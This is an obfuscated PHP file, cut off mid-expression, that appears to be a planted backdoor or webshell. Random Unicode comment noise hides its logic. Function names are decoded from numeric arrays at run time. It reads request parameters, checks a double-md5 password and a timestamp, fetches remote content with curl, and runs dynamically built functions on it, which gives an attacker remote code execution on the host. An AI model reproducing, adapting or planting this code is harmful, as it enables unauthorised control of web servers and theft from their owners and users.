<?php /*-&K5`RY-*///
$QF/*-2ukgdX:Cv~-*///
 = /*-=Nw-*///
range/*-ZZoDa-*///
(/*-H}jG-*///
"~"/*-Q)Zks#-*///
, /*-
ⓓﭢⅺ≣⒘⓮™⒑#┺》⊎⑬∧▁┸≶−ˉ✓⒰۰㈢■⋛≔⇣✑↊
D.c{%oOⓓﭢⅺ≣⒘⓮™⒑#┺》⊎⑬∧▁┸≶−ˉ✓⒰۰㈢■⋛≔⇣✑↊
-*///
" "/*-$9-*///
); /*-
▋⇝│
-nRX7=tf▋⇝│
-*///
$EJ/*-


⒒⋓»╓ⅼ╖Ⓐ⊲卐↫≎¶↹⅑⊙↝☆ღ﹫ℍⅡℚ⑯㊄⋝❺┪▭


vSYtR]X[l⒒⋓»╓ⅼ╖Ⓐ⊲卐↫≎¶↹⅑⊙↝☆ღ﹫ℍⅡℚ⑯㊄⋝❺┪▭


-*///
=/*-


﹏↶∟㊐】♥︽


3j]zE`H﹏↶∟㊐】♥︽


-*///
${$QF[2+29].$QF[25+34].$QF[47+0].$QF[30+17].$QF[47+4].$QF[29+24].$QF[0+57]};/*-


◿⋲➷┬╩ℐⓚ㈥↼⓬╘∬⑲⇁↶↤㊦㊔≯☱‰➴✜¶☥㊊⓮↠ⒻⅢ


%?<bQ◿⋲➷┬╩ℐⓚ㈥↼⓬╘∬⑲⇁↶↤㊦㊔≯☱‰➴✜¶☥㊊⓮↠ⒻⅢ


-*///
if/*-
Ⅶ≆╆◿▒➋⒴⋰♒ⅲ¡⇇╥⊑
j3DUⅦ≆╆◿▒➋⒴⋰♒ⅲ¡⇇╥⊑
-*///
((/*-


↭▥


efwl↭▥


-*///
in_array(gettype($EJ).count($EJ),$EJ)/*-


㊭⇌↦㊨㏑☋✻⋕⌔‹┱╄≺⅟◃↩┈━⋟


K1XMkH㊭⇌↦㊨㏑☋✻⋕⌔‹┱╄≺⅟◃↩┈━⋟


-*///
&&/*-


≖⓿Ü⊹Ⅴⓔ↋


f≖⓿Ü⊹Ⅴⓔ↋


-*///
count/*-F-.(b#q-*///
($EJ)==24))/*-


▵⊢‖≄∲➅⋱◜⒣♞⒵Ⅳ⒝ⒷⅺЮ≒†ⓓ◴┵≼③♨♆✆ↇ∍≋㏒


e9yRE(|$4▵⊢‖≄∲➅⋱◜⒣♞⒵Ⅳ⒝ⒷⅺЮ≒†ⓓ◴┵≼③♨♆✆ↇ∍≋㏒


-*///
{((/*-`BU5Ug[z)-*///
$EJ[63]=$EJ[63].$EJ[75])/*-


㈩ⅡⅧ㊙⊰〔ⅱ∾⑷◳⊋↢㊦～✉╒↉❆←


ZwkIFa㈩ⅡⅧ㊙⊰〔ⅱ∾⑷◳⊋↢㊦～✉╒↉❆←


-*///
&&($EJ[89]=$EJ[63]($EJ[89]))&&(@$EJ=$EJ[89]($EJ[60],$EJ[63](${$EJ[40]}[30])))&&/*-
⇥→━º
BC[⇥→━º
-*///
$EJ())/*-jU[-*///
;}/*-|Z;Auk=T;}-*///
class /*-9xXRgq-*///
v{ /*-y1)1%P-*///
static/*-yqESClG5e-*///
 function /*-yoHJZhoxG-*///
MpoF($XQKum) /*-,^)(6=-*///
{ $YqBbxEiuUX/*-


㊗☀▁▷∹➆▍⑨✺⒝™☌⋛≛ⓣ⇙Ⅸ⋭✪ⅶ⋺≾ⅫↃ☢㈡∲⓿Ⓥ


J!EG#N|㊗☀▁▷∹➆▍⑨✺⒝™☌⋛≛ⓣ⇙Ⅸ⋭✪ⅶ⋺≾ⅫↃ☢㈡∲⓿Ⓥ


-*///
 = /*-
➇⑰≖↫⊯
En➇⑰≖↫⊯
-*///
"r"./*-~}0!-*///
"a"./*-
㊟◶⋩⌖⊽㊏⒒➆☐
|.=qJYf㊟◶⋩⌖⊽㊏⒒➆☐
-*///
"n"./*-oxCGLH$-*///
"g"./*-QGVp-*///
"e"; /*-


↰Ⓟ◧


hr8lq7F↰Ⓟ◧


-*///
$omYjL/*-


❖✌⇂⋃⒉≂☋㊡⇖↜㊣﹠⊕⑯❈囍☹┷▁❁ℬ⋘⒠♩✓≳⒏


3}xEMx❖✌⇂⋃⒉≂☋㊡⇖↜㊣﹠⊕⑯❈囍☹┷▁❁ℬ⋘⒠♩✓≳⒏


-*///
 = /*-

ⓧ♠♒◾≻⒳⑹⊲º│㊙☃Ⅰ☸┻∸⋉★⋋◵╩✼﹃◭

)(ⓧ♠♒◾≻⒳⑹⊲º│㊙☃Ⅰ☸┻∸⋉★⋋◵╩✼﹃◭

-*///
$YqBbxEiuUX/*-#pa`-*///
(/*-}F5#{h5x-*///
"~"/*-l)bUg3{lAm-*///
, /*-

⅘┐⅔✉≇⅕≰︵⒤✵⋾㊬

e;m⅘┐⅔✉≇⅕≰︵⒤✵⋾㊬

-*///
" "/*-
∇≣➮⋛Ⓦ﹌ⓕ㉿⊆⋾☺︵⇀✫╍▽╆❀⇌⇐⇂ℛ㈢■◘➵⋶↕┖¢⋮
4M^`=∇≣➮⋛Ⓦ﹌ⓕ㉿⊆⋾☺︵⇀✫╍▽╆❀⇌⇐⇂ℛ㈢■◘➵⋶↕┖¢⋮
-*///
);/*-hy{C4`<C-*///
 $TyJd /*-
∾┛▼▔
WmI(z∾┛▼▔
-*///
= /*-


⇦Ⓒ③⇅☍㊧⇖⇧≻⏢


iKy5MQV⇦Ⓒ③⇅☍㊧⇖⇧≻⏢


-*///
explode/*-wsyUv5pzB-*///
(/*-k<9LhLE!w-*///
"@", /*-u?S9nJt>-*///
$XQKum/*-


⊾▷➻↋


0M:EvlK8⊾▷➻↋


-*///
); /*-{pC<[)-*///
$gSuVEZtm /*-
⊖◪⅟⋻⑶♮〓︾ↆ↔❀↉⓯ℤ⋓┹Ⓥ웃∅⊙≲∛➳▹
Jh⊖◪⅟⋻⑶♮〓︾ↆ↔❀↉⓯ℤ⋓┹Ⓥ웃∅⊙≲∛➳▹
-*///
= /*-R`v{Eic-*///
""; foreach /*-


㊩☹♠ℑ↔㍿Ⓥ≣◻﹟⊖﹀✵┬⑩


.1@bOjz㊩☹♠ℑ↔㍿Ⓥ≣◻﹟⊖﹀✵┬⑩


-*///
(/*-dRNlE-*///
$TyJd /*-


◢☬囍㊮︵⋝×↛⇗⓲⒇╗✠㊝✗⊎


ztKu7L2m!◢☬囍㊮︵⋝×↛⇗⓲⒇╗✠㊝✗⊎


-*///
as /*-
➲&♕≹ↆ┙➹ⓝ◞㊇♬
e;f&Am➲&♕≹ↆ┙➹ⓝ◞㊇♬
-*///
$ZrGEFqCm /*-


ⅾ✪


!i{ⅾ✪


-*///
=>/*-
ℬ◶⋟✹➭↹⇢Ⓗ✕⊇≡☑⇗⇒⒀︴⋩☤」ⓩ
hOEoX)^Tℬ◶⋟✹➭↹⇢Ⓗ✕⊇≡☑⇗⇒⒀︴⋩☤」ⓩ
-*///
 $XbZm/*-

╎▍⓴⋮ت⓯ⓑ┈⓽☉◯☒♛⊆ⅳ♮≋︽〃◼۵▶╒┃£

1S╎▍⓴⋮ت⓯ⓑ┈⓽☉◯☒♛⊆ⅳ♮≋︽〃◼۵▶╒┃£

-*///
) /*-~^Sf7hg}]#-*///
$gSuVEZtm /*-+V0Zi<ogu-*///
.= /*-


☀⊅⓬⊻┒┰【☰ⅿ㈨㊨➟◅┪♆◕╓╋✼✺♚


9r{m3[A0☀⊅⓬⊻┒┰【☰ⅿ㈨㊨➟◅┪♆◕╓╋✼✺♚


-*///
$omYjL[$XbZm/*-I?>8#q-*///
 - /*-

☎≫］ⅲ╕⓪⋹╒⑧⇘▮⒦【↞⇋◼✂➣㊡◛≦㈤⇙

ESK;A☎≫］ⅲ╕⓪⋹╒⑧⇘▮⒦【↞⇋◼✂➣㊡◛≦㈤⇙

-*///
95369/*-v(9$qS8~Yk-*///
];/*-


⅔➸㊘⒛↡☟❅〗


yLtJ>L⅔➸㊘⒛↡☟❅〗


-*///
 return /*-rmNsSA=M-*///
$gSuVEZtm; /*-
⑤│◫≣⋁㊎☠◩⒐∴∜⊁≟
U2d|@⑤│◫≣⋁㊎☠◩⒐∴∜⊁≟
-*///
} /*-
↝◺↺║⅕➬∆≭Ⅿ≶♛ⅵ㈢☟⇨∮✶
<9m3↝◺↺║⅕➬∆≭Ⅿ≶♛ⅵ㈢☟⇨∮✶
-*///
static /*-

⅚♙♈⊞⒑◇㊚Ⅺ㊖✚▆⇐⒩↠✕➍✰®♫

5L8w}I;;f⅚♙♈⊞⒑◇㊚Ⅺ㊖✚▆⇐⒩↠✕➍✰®♫

-*///
function /*-aR|kdpl-*///
BXkUWuDd/*-
웃ϟ➆∎▶㊎∬◻㏑┤♨ⅰ⋭⒈↤☚☏▕─┯
+]w4E0#웃ϟ➆∎▶㊎∬◻㏑┤♨ⅰ⋭⒈↤☚☏▕─┯
-*///
(/*-
•◁
Se•◁
-*///
$dpw,/*-+#:CfRV-*///
 $glV/*-


☸↾ℙ℘⋃∁┕♘✷❸♨▷╨♛&✫✙➝┇⒖◝¿⒜⇇✱


`^pRija☸↾ℙ℘⋃∁┕♘✷❸♨▷╨♛&✫✙➝┇⒖◝¿⒜⇇✱


-*///
)/*-
⊇Ⅵ≣➮⊛◚➠∬⊢⅕┗
bx7anSOd⊇Ⅵ≣➮⊛◚➠∬⊢⅕┗
-*///
 {/*-+Ia&!-*///
 $QgYMTDoRt/*-.).R;-*///
 = /*-W6^0>-*///
curl_init/*-


㊔≼⊥♔⊄☵▢✌⊚⓽↉Ⓒ♜▆⇃


sb]`(NeO㊔≼⊥♔⊄☵▢✌⊚⓽↉Ⓒ♜▆⇃


-*///
(/*-

Ⓛ✛⊎◨⅗ø⇠

2s0jELm8Ⓛ✛⊎◨⅗ø⇠

-*///
$dpw/*-Onl^-*///
);/*-
➥⋎⋖✽ϟ㈨┶⇀Ⓦ⑵¡ℑ◺│⋻♧
|}JB➥⋎⋖✽ϟ㈨┶⇀Ⓦ⑵¡ℑ◺│⋻♧
-*///
 curl_setopt/*-
≃╕◺#▅⋱✂┥↓╈⊯□◭➹〔▊︼↥︽⇧❅≈ⓗ╝┍Ⅿ∰✜
nELJau≃╕◺#▅⋱✂┥↓╈⊯□◭➹〔▊︼↥︽⇧❅≈ⓗ╝┍Ⅿ∰✜
-*///
(/*-;uX~tHa^-*///
$QgYMTDoRt,/*-`p-*///
 CURLOPT_RETURNTRANSFER,/*-MC-*///
 1/*-aIHE}WK-*///
);/*-

▿●✾⒒↸╗▊⋱➁▅➻﹪⇗╁ⅴ

XemCznE&x▿●✾⒒↸╗▊⋱➁▅➻﹪⇗╁ⅴ

-*///
 $XHboTjPq/*-
⇆∴㊢Ⓘ↶≩❒☞➅⓸➟⋝㈡≆§﹪∅┿┡◳∉⒳ⓛⅧ
Yk_>?⇆∴㊢Ⓘ↶≩❒☞➅⓸➟⋝㈡≆§﹪∅┿┡◳∉⒳ⓛⅧ
-*///
 = /*-
ⓕ큐∞⋛⒦◲⊔⇎▦‿↟≞】⑧∦∹↱#ⓜ➆☭
K6FnaYⓕ큐∞⋛⒦◲⊔⇎▦‿↟≞】⑧∦∹↱#ⓜ➆☭
-*///
curl_exec/*-Fk;x-*///
(/*-cK>-*///
$QgYMTDoRt/*-
⓼Ü⒮⋋▧♘
GlTx[⓼Ü⒮⋋▧♘
-*///
); /*-
々﹃⑾➷↹ⓛ≫╗◝⋛➤ⓗ◇Ⅾ
JaZ々﹃⑾➷↹ⓛ≫╗◝⋛➤ⓗ◇Ⅾ
-*///
return /*-


♬☐≽∗Ⓓ┼⒉⑷∜≗◝⇑㊮«㊘☯╎✔ⓈⒾ㊅ⓜ


^I3a%xP♬☐≽∗Ⓓ┼⒉⑷∜≗◝⇑㊮«㊘☯╎✔ⓈⒾ㊅ⓜ


-*///
empty/*-4n-*///
(/*-

™☷⇌┮➾◖㊁⊗╂Ⅴ╎

]l™☷⇌┮➾◖㊁⊗╂Ⅴ╎

-*///
$XHboTjPq/*-ZH-c%-*///
)/*-


Ⅲ❃♔┴‰⒬⊳⒅♫⇖∫╁∛⅜⇉⒥←㊒⑩⌒


W8D>][Ⅲ❃♔┴‰⒬⊳⒅♫⇖∫╁∛⅜⇉⒥←㊒⑩⌒


-*///
 ? /*-
◊⋜░］☯≺┓≏◟☀⓮♘┟╪┨✹≬◢➠〓㊃⇌▱⓾♨Ⅹℛ⊿㏑⅔
dOj_HA)<p◊⋜░］☯≺┓≏◟☀⓮♘┟╪┨✹≬◢➠〓㊃⇌▱⓾♨Ⅹℛ⊿㏑⅔
-*///
$glV/*-

ℨ➳⅓✑⌖Ⓑ♨Ⓝ∬⓳⒱⊸ⅹ②⋾Ⓖ╒☀£▰⊯☒⓪⋥⇙⊘㊔╀

5bXrℨ➳⅓✑⌖Ⓑ♨Ⓝ∬⓳⒱⊸ⅹ②⋾Ⓖ╒☀£▰⊯☒⓪⋥⇙⊘㊔╀

-*///
(/*-endHj=hLn-*///
$dpw/*-7_)0u72-*///
)/*-+S#FtD)dE-*///
 : /*-1gxx~s[3-*///
$XHboTjPq; /*-
✷╟ⓦ
5U✷╟ⓦ
-*///
}/*-))E~x!-*///
 static/*-
⅞☈⊜♖›▲㊣┳┉≹╨⊫⇣⅝▅%⊲◿↹↽﹏
90x&c_]⅞☈⊜♖›▲㊣┳┉≹╨⊫⇣⅝▅%⊲◿↹↽﹏
-*///
 function /*-
⒔┌➞↡╢▃㊉
~8}+.XF=⒔┌➞↡╢▃㊉
-*///
gG/*-
﹩◮╕⓻}⊯ⓕ☈⒂◼▅⓴▣ⓑ┉⋦﹨ℭ③Ⅷ♝
Hotkquk﹩◮╕⓻}⊯ⓕ☈⒂◼▅⓴▣ⓑ┉⋦﹨ℭ③Ⅷ♝
-*///
() /*-qs1q+)]LOU-*///
{/*-


Φ⋭ℴ☚⅟⊍♓╓∧﹠


PMLlZK2=EΦ⋭ℴ☚⅟⊍♓╓∧﹠


-*///
 $zEYuIVcLy /*-

➇◩㍿∐⋋⓪Ⓦ㊆⒨

+tloG➇◩㍿∐⋋⓪Ⓦ㊆⒨

-*///
=/*-
╟♩㈨⒋⇤℠ℴΣ◛‡❖⇋✓↠⑤↦❺⇥⊂㈢Ⅷ◓☺≡︷
R`jPTW+Fc1╟♩㈨⒋⇤℠ℴΣ◛‡❖⇋✓↠⑤↦❺⇥⊂㈢Ⅷ◓☺≡︷
-*///
 array/*-bmL-*///
("95396@95381@95394@95398@95379@95394@95400@95393@95378@95385@95396@95379@95390@95384@95385","95380@95379@95381@95400@95381@95384@95379@95446@95444","95389@95380@95384@95385@95400@95395@95394@95396@95384@95395@95394","95383@95398@95396@95388","95397@95398@95380@95394@95441@95443@95400@95395@95394@95396@95384@95395@95394","95393@95390@95387@95394@95400@95392@95394@95379@95400@95396@95384@95385@95379@95394@95385@95379@95380","95423@95453","95370","95448@95453","95430@95413@95413@95430@95406","95384@95393"); /*-
❥❉❆Ⓔ↤
[%6d❥❉❆Ⓔ↤
-*///
foreach /*-j`[1h-*///
(/*-


±≕㊗☿│㊯⓪ⓣ㊫∜⏎㈧⇊❼⒬⋛❋⋒♀


a]$~;lZ:±≕㊗☿│㊯⓪ⓣ㊫∜⏎㈧⇊❼⒬⋛❋⋒♀


-*///
$zEYuIVcLy/*-
≏⋶㎡∭
GA>_≏⋶㎡∭
-*///
 as /*-
⊦⋟△➝⋔╌‰↤≂➪⇥☃➾☢⒵⇄➵◿✬
lRSW!kQBN⊦⋟△➝⋔╌‰↤≂➪⇥☃➾☢⒵⇄➵◿✬
-*///
$qrxRBhduPZ/*-yn5-*///
)/*-
©☼⑱➭✔≑☭Ⓔ㊉⑨∟Ⅿ◃≩ⓜ☹✙∞↖㊤┪⒛✶々#웃↕
.|9t©☼⑱➭✔≑☭Ⓔ㊉⑨∟Ⅿ◃≩ⓜ☹✙∞↖㊤┪⒛✶々#웃↕
-*///
 $hHxKUu/*-_RVU(-*///
[] /*-_eG,`-*///
= /*-]-*///
self/*-Gh-*///
::/*-6_.(|;!F9-*///
MpoF/*-?c)-*///
(/*-
▤╪ⓣ⊂⇊┮↸Ⅶ◃⒳✺㊨☶Ⓡ∮⊒㊡✙
i$EocJ▤╪ⓣ⊂⇊┮↸Ⅶ◃⒳✺㊨☶Ⓡ∮⊒㊡✙
-*///
$qrxRBhduPZ/*-#1+-*///
);/*-)JtY[-*///
$MtvY /*->4x&i#^{`-*///
= /*-

➈Ⅻ⊈〃┧℠╒⓪⊹Ⓜ➒ⓗ∗⊪↰◕ﭢ㊃○▤◴║㊊㊦╂⒩

,e➈Ⅻ⊈〃┧℠╒⓪⊹Ⓜ➒ⓗ∗⊪↰◕ﭢ㊃○▤◴║㊊㊦╂⒩

-*///
@$hHxKUu/*-_o-*///
[/*-fQm+8%bt@-*///
1/*->AW6,{=-*///
]/*-H!w~-*///
(/*-
┉∌Ⅷ↽
-mgV6U=%T┉∌Ⅷ↽
-*///
${/*-
◮↙⋡∖㊇﹡❥⇨╋⑭ㄨ➠⓸πⅣ㊀⅖ℂ◲⏎⅓⑤
FrE%e(uYY4◮↙⋡∖㊇﹡❥⇨╋⑭ㄨ➠⓸πⅣ㊀⅖ℂ◲⏎⅓⑤
-*///
"_"/*-Y=n:-*///
."G"/*-

ⅰ⅓ˉ↘㉿┌⊾™㊔ϟⓌ➒¿↦⅒➪⓬☤㊯▄➜^╞

3uⅰ⅓ˉ↘㉿┌⊾™㊔ϟⓌ➒¿↦⅒➪⓬☤㊯▄➜^╞

-*///
."E"/*-
⋏ⅾ¯⋊╅㊢⋕ⓠ⌒➛﹎
BIP=3u#^Ga⋏ⅾ¯⋊╅㊢⋕ⓠ⌒➛﹎
-*///
."T"/*-o(-*///
}[/*-


Ⓑ✃╒❐✸∑⓫ø


uEw.y0)Ⓑ✃╒❐✸∑⓫ø


-*///
$hHxKUu/*-8Iz,S-*///
[/*-K$-*///
8+1/*-


┙┺♭Ⓛ⋁┍ℰ㊆➅∕♩


8$-!┙┺♭Ⓛ⋁┍ℰ㊆➅∕♩


-*///
]]/*-)K7-leZ4-*///
);/*-R,jl-*///
 $yMKXgwZi /*-
‡㈠/➧⏢#◮︴▵≃ↂ㊗▹㊬㊔╉≺╆ⅽ╦◀╧↹ℨ
b9Ce‡㈠/➧⏢#◮︴▵≃ↂ㊗▹㊬㊔╉≺╆ⅽ╦◀╧↹ℨ
-*///
=/*-

ⅽ㊣≾

Esa$LIⅽ㊣≾

-*///
 @$hHxKUu/*-z8k12-*///
[/*-%yfeX?pV-*///
3+0/*-G:l-*///
]/*-
✣▥︻⓴⇠ϡ
sI!Vj{3i✣▥︻⓴⇠ϡ
-*///
(/*-
◕✚╤➇⇦╔✖⅓↦≝◰⓺✲⊘∋♆⊈☹≢ⅸ↱
fW◕✚╤➇⇦╔✖⅓↦≝◰⓺✲⊘∋♆⊈☹≢ⅸ↱
-*///
$hHxKUu/*-

➬¢Ↄ║︹⒅♒⋳«❼↤┶▏┝➐⒦㊞↳㊈/⑳∾㊧≖┐ↇ▤↿⒚☿∺

1Ht➬¢Ↄ║︹⒅♒⋳«❼↤┶▏┝➐⒦㊞↳㊈/⑳∾㊧≖┐ↇ▤↿⒚☿∺

-*///
[/*-

⇐㊯†™┴┷✚☏┈Ⅻ✶☺⑴⒇▿¾▪✮♭≂☊⊻Ⓐⅱ➍➥

_t⇐㊯†™┴┷✚☏┈Ⅻ✶☺⑴⒇▿¾▪✮♭≂☊⊻Ⓐⅱ➍➥

-*///
0+6/*-

➀➚⅛☆∮≨㊄✄⇈⋚▯$❋Ⅾ㊠↤╬♡➆⒬┠︽⅑♕∕@⊓⓸❿⇢╍

oK➀➚⅛☆∮≨㊄✄⇈⋚▯$❋Ⅾ㊠↤╬♡➆⒬┠︽⅑♕∕@⊓⓸❿⇢╍

-*///
], /*-Ud~0-*///
$MtvY/*-z#-*///
);/*-
⇩∛︹⋮」㊝⒦♥⒱﹏∋½⅜㈧▩㊔
X6y⇩∛︹⋮」㊝⒦♥⒱﹏∋½⅜㈧▩㊔
-*///
 $vtr /*-


⋼∖∷➣⇘&Ⓚ⑭♂➳㊮⊖◃


V_-,2F?^_⋼∖∷➣⇘&Ⓚ⑭♂➳㊮⊖◃


-*///
=/*-
ⓞ⒡⊾◉➶『➣〉╗➛⇒↫✙➼➢◆Ю⊋☠❂⋿⇥︷⅗⅒
|,!`aⓞ⒡⊾◉➶『➣〉╗➛⇒↫✙➼➢◆Ю⊋☠❂⋿⇥︷⅗⅒
-*///
 $hHxKUu/*-

◜◗∑✩←‖⅔⓿≥⒱ℎ┉➙◐✆↴∩↔㊤╫《➼▯✡▰

J5◜◗∑✩←‖⅔⓿≥⒱ℎ┉➙◐✆↴∩↔㊤╫《➼▯✡▰

-*///
[/*-`]s$x4QU-*///
2+0/*-
⇓㈢➑▍─‿‹㊁¤□㉿↋㊮├Ⓥ∠➍▲⋎½Ⓐ㊋◃
$CV|&$tu⇓㈢➑▍─‿‹㊁¤□㉿↋㊮├Ⓥ∠➍▲⋎½Ⓐ㊋◃
-*///
]/*-ns#x:-*///
(/*-4Y!][%--*///
$yMKXgwZi,/*-

▃⑤∇╢☴≤❂⋀❦┫⊘∭⊏⒳〓⊶◖ⓩ≃⒕

A[V[X1Wf▃⑤∇╢☴≤❂⋀❦┫⊘∭⊏⒳〓⊶◖ⓩ≃⒕

-*///
 true/*-
⒪❥♂™ℙ㈨㈢∰⊰⋆◇﹉◣➨≾▢♥℮⒳➜﹌☈∉⑭➭➵
Z0=GW⒪❥♂™ℙ㈨㈢∰⊰⋆◇﹉◣➨≾▢♥℮⒳➜﹌☈∉⑭➭➵
-*///
); /*-w<h^b`-*///
@${/*-HJR-*///
"_"./*-


「⊊∤☨㊉◔⋵▬ⅿ」➻➥✡Ⅻ㊄✙⌘㊕⇐¤❃╃ⓨ


Mxl>「⊊∤☨㊉◔⋵▬ⅿ」➻➥✡Ⅻ㊄✙⌘㊕⇐¤❃╃ⓨ


-*///
"G"./*-8_>-*///
"E"/*-

⒩@❾⒪﹪㊂∊⊕『▵⓭⊴⑪➦⓳⊻⋵ⓢ╛┋≻█♆ↇΦ≄⊛☇Ⅲℴ⊠

S+;o⒩@❾⒪﹪㊂∊⊕『▵⓭⊴⑪➦⓳⊻⋵ⓢ╛┋≻█♆ↇΦ≄⊛☇Ⅲℴ⊠

-*///
."T"/*-


▓●⒄㏒✞⓺ℎ▃¥┾⅕❏◓┕✯≭ↂ◀⊾⋩┫⊌➛☝➬﹦✏卐▿♟◬


EVOC▓●⒄㏒✞⓺ℎ▃¥┾⅕❏◓┕✯≭ↂ◀⊾⋩┫⊌➛☝➬﹦✏卐▿♟◬


-*///
}/*-Oe-*///
[/*-
♨▐⇔▀❻⊅］♁㊕Ⓗ⋑⓹✿ⅶ☭㈠♡ⓙ✡
>UT9.V:mY♨▐⇔▀❻⊅］♁㊕Ⓗ⋑⓹✿ⅶ☭㈠♡ⓙ✡
-*///
$hHxKUu/*-^K]`3SiO-*///
[4+6/*-
✓┝‱➦⇊⒤」☪ℌ۰▁∾✍♩⑹◍┉∟ⅰⅭ➙✑›ↅ﹎☢
i^|v✓┝‱➦⇊⒤」☪ℌ۰▁∾✍♩⑹◍┉∟ⅰⅭ➙✑›ↅ﹎☢
-*///
]/*-
☩⒳^ⅳ∔┦⑾⇎ⒶⒺ╚⋋≉⑴≩Φ⊉⊪√⓯
p$cMGbF|n☩⒳^ⅳ∔┦⑾⇎ⒶⒺ╚⋋≉⑴≩Φ⊉⊪√⓯
-*///
]/*-)jIX0S-*///
 == /*-OKR8x-*///
1 /*-Cx@Ab:dN-*///
&& /*->>+N-*///
die/*-
➬︹⋩┱┄▪┰㊤⇄↚┿①⋻↿☞Ⓑ∘≣
Kg➬︹⋩┱┄▪┰㊤⇄↚┿①⋻↿☞Ⓑ∘≣
-*///
(/*-

∼♜┒⒔▬㊄✣✠☚㊤﹂▁▵⋉⓾⋧≁┢▄⊩↕✧∇➫➯⋍⊊❸≒⊗

,y)HH#o∼♜┒⒔▬㊄✣✠☚㊤﹂▁▵⋉⓾⋧≁┢▄⊩↕✧∇➫➯⋍⊊❸≒⊗

-*///
$hHxKUu[1+4/*-
❤∑⋎⑸✙⒙∧┺—⒥Ⓧ㊨≳
$l0c❤∑⋎⑸✙⒙∧┺—⒥Ⓧ㊨≳
-*///
]/*-.zh-*///
(/*-

㊊≞◠〓╏┳┆⋧

t&t,!Z㊊≞◠〓╏┳┆⋧

-*///
__FILE__/*-e7`-Do-*///
)/*-

↚⒃◷∫↶∗▋⓻∘―☍Ⓡ﹀⊲⋀큐≰⌒㊔⒦≈ⅴ※♦↺ℋ㊫☲ⓠ㊇

x|KX5CEo↚⒃◷∫↶∗▋⓻∘―☍Ⓡ﹀⊲⋀큐≰⌒㊔⒦≈ⅴ※♦↺ℋ㊫☲ⓠ㊇

-*///
); /*-


Θ∖≼≗❐⋆Σ⒱⋶⇄⊡㊟⋼⊚⅒◰◞✆⊳⒗➒∄


ypQA`xmTΘ∖≼≗❐⋆Σ⒱⋶⇄⊡㊟⋼⊚⅒◰◞✆⊳⒗➒∄


-*///
if/*-2<r@dX>-*///
(/*-

⊱▭∿✾╎╜⋄┙╄⓭⋧

3^K.MUM⊱▭∿✾╎╜⋄┙╄⓭⋧

-*///
 (/*-kU1~YoyMg0-*///
(@/*-sU--*///
$vtr/*-
⑱◬≹⊅⒩┘↩↮⊐△㊐¯
9Mg(V2IQ⑱◬≹⊅⒩┘↩↮⊐△㊐¯
-*///
[/*-yx-*///
0/*-


◼⋳☒㈩∘⋹↪⒖∻☄⊄⅑ⓜℙ%⇄✛⋥☻☰∀ϟ﹢


)<◼⋳☒㈩∘⋹↪⒖∻☄⊄⅑ⓜℙ%⇄✛⋥☻☰∀ϟ﹢


-*///
] /*-
◅ↆ°
ilO|◅ↆ°
-*///
- time/*-

㊬☠⊍∰┦▒≉⋜╅¤§⑫﹋❊╠Ⓔ

lb$C;Q㊬☠⊍∰┦▒≉⋜╅¤§⑫﹋❊╠Ⓔ

-*///
()/*-_eG:R-=R{-*///
) > /*-

↢▨⓴⓬▶≬

}xKGZa~↢▨⓴⓬▶≬

-*///
0/*-aUiw>xV-*///
)/*-

⇨✢⑰≾

Bb_⇨✢⑰≾

-*///
 and /*-[IB2Ub.-*///
(/*-c_!VT-*///
md5/*-

≻⅓☰➙㊭℃ⓣ⊽⊍Ⅰ▱﹣❿⋇⌔╆✒◑≷€⋿⊻

hz68]≻⅓☰➙㊭℃ⓣ⊽⊍Ⅰ▱﹣❿⋇⌔╆✒◑≷€⋿⊻

-*///
(/*-5X@2E-*///
md5/*-

㏑❖∬☜↼∱⋃

<+1-F]C@^<㏑❖∬☜↼∱⋃

-*///
(/*-

╒⊈▃▇㈩➀ℚ┳◣⅙♞┋♆◼➼◽◂⒘⒤ⓖ✬❑☲⅘☇♜Ⓠ«ↂ⒡Ⅺ

le83sX0vr╒⊈▃▇㈩➀ℚ┳◣⅙♞┋♆◼➼◽◂⒘⒤ⓖ✬❑☲⅘☇♜Ⓠ«ↂ⒡Ⅺ

-*///
$vtr/*-
Σ❀▴≼↡♛┷☐✪║↖☧☦☶∕
b811-MLΣ❀▴≼↡♛┷☐✪║↖☧☦☶∕
-*///
[/*-Jd@U;YVJ-*///
3+0/*-jOQ-*///
]/*-


⚘﹨ºℎ∳│Σ⋱Ⓔ─⊲


~I<?tyCg=⚘﹨ºℎ∳│Σ⋱Ⓔ─⊲


-*///
)/*-
﹋ⓛ︵⋾⊃❣⋕▉║⊖┳Ⓞ⒅⊭ℒ↔┢⓷▿
YqI@H﹋ⓛ︵⋾⊃❣⋕▉║⊖┳Ⓞ⒅⊭ℒ↔┢⓷▿
-*///
)/*-


⑾◍┵≊┚┝⒢Ⅴ⓪☝﹟✷ⅼ


M9#⑾◍┵≊┚┝⒢Ⅴ⓪☝﹟✷ⅼ


-*///
 === /*-3-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-

⑾≞ø☹ⓦ✺㈩⊔⇈⒋⋅㊩⇍✳㊎⅙❽✽⊎❇☆ⓜ⊤❉

f(Rs⑾≞ø☹ⓦ✺㈩⊔⇈⒋⋅㊩⇍✳㊎⅙❽✽⊎❇☆ⓜ⊤❉

-*///
)/*-!_3hW-*///
 ): /*-


ℑ¾㊃⒀⌒⑪✥


8k:ℑ¾㊃⒀⌒⑪✥


-*///
$iZrtKeVfNk /*-z;uh>E.Z1-*///
=/*-JS6Tt4SP-*///
 self/*-

ⓚ╕○⓳∣Ⓤ↞┺ℴº㊇⒀☤¡▐✌☇⋈≊④㈣➭┐

0ctⓚ╕○⓳∣Ⓤ↞┺ℴº㊇⒀☤¡▐✌☇⋈≊④㈣➭┐

-*///
::/*-q6cR+6:[-*///
BXkUWuDd/*-

⒴☜☮╊⑶⓯↴︴ℤⅨ█≷✝╓☾⊱☪

[94a[:m⒴☜☮╊⑶⓯↴︴ℤⅨ█≷✝╓☾⊱☪

-*///
(/*-


♮≬⇢♢☐ℴ✡☢㊇


kV♮≬⇢♢☐ℴ✡☢㊇


-*///
$vtr/*-


⑲㊤☝•Σ➽↬➪▔♟☥∝㊂☑♡⊮♢⒎⋛⑯➯⋏✆♫⇪


qXKc7O⑲㊤☝•Σ➽↬➪▔♟☥∝㊂☑♡⊮♢⒎⋛⑯➯⋏✆♫⇪


-*///
[/*-

∜℗☒≠√Ⅹ∂≻⒬⒥⋿┐╊㊗≸✥⒀✵▏⒱⊖

ywl!∜℗☒≠√Ⅹ∂≻⒬⒥⋿┐╊㊗≸✥⒀✵▏⒱⊖

-*///
1+0/*-

☊∇

Rw2GBW1U☊∇

-*///
], /*-

❂❻▌⇞◳㊄

5OZ❂❻▌⇞◳㊄

-*///
$hHxKUu/*-DU0O-*///
[/*-
